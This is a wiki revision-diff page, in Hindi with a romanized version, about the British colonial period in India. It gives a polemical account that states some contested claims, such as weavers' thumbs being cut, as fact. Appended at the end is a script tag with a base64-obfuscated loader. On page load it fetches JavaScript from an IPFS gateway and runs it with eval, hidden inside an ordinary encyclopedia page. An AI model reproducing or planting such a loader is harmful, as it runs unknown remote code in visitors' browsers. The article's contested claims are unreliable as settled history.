Difference between revisions of "उपनिवेश काल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (औपनिवेशिक काल का नाम बदलकर उपनिवेश काल कर दिया गया है)
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
[[भारत]] में [[अंग्रेज़|अंग्रेज़ों]] के शासन काल को औपनिवेशिक काल कहा जाता है। यह सन् 1760 से 1947 ई. तक माना जाता है।  
+
[[भारत]] में [[अंग्रेज़|अंग्रेज़ों]] के शासन काल को औपनिवेशिक अथवा उपनिवेश काल कहा जाता है। यह सन् 1760 से 1947 ई. तक माना जाता है। ब्रिटेन की समृद्धि और औद्योगिक क्राति के पीछे ब्रिटिश शासकों द्वारा भारत से लूटी गई संपदा का निवेश रहा है। भारतीयों के प्रति ब्रिटिश बर्बरता [[इतिहास]] में अमानुषिक क्रूरता का उदाहरण है। [[बंगाल (आज़ादी से पूर्व)|बंगाल]] का [[अकाल]], [[1857 का स्वतंत्रता संग्राम|1857 की क्रांति]] के बाद देशभक्तों का नरसंहार, बुनकरों के अंगूठे काटने, भारतीय भाषाओं, ज्ञान परंपरा और विद्या केंद्रों को नष्ट कर विभिन्न समुदायों में वैमनस्य के बीज बोकर विभाजन तक का सफ़र ब्रिटिश अमानवीयता का उदाहरण है। इसके लिए कभी ब्रिटेन ने भारत तथा भारतीय नागरिकों से क्षमा नहीं मांगी।
 +
==संबंधित लेख==
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
 
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:51, 19 March 2012

bharat mean aangrezoan ke shasan kal ko aupaniveshik athava upanivesh kal kaha jata hai. yah sanh 1760 se 1947 ee. tak mana jata hai. briten ki samriddhi aur audyogik krati ke pichhe british shasakoan dvara bharat se looti gee sanpada ka nivesh raha hai. bharatiyoan ke prati british barbarata itihas mean amanushik kroorata ka udaharan hai. bangal ka akal, 1857 ki kraanti ke bad deshabhaktoan ka narasanhar, bunakaroan ke aangoothe katane, bharatiy bhashaoan, jnan paranpara aur vidya keandroan ko nasht kar vibhinn samudayoan mean vaimanasy ke bij bokar vibhajan tak ka safar british amanaviyata ka udaharan hai. isake lie kabhi briten ne bharat tatha bharatiy nagarikoan se kshama nahian maangi.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>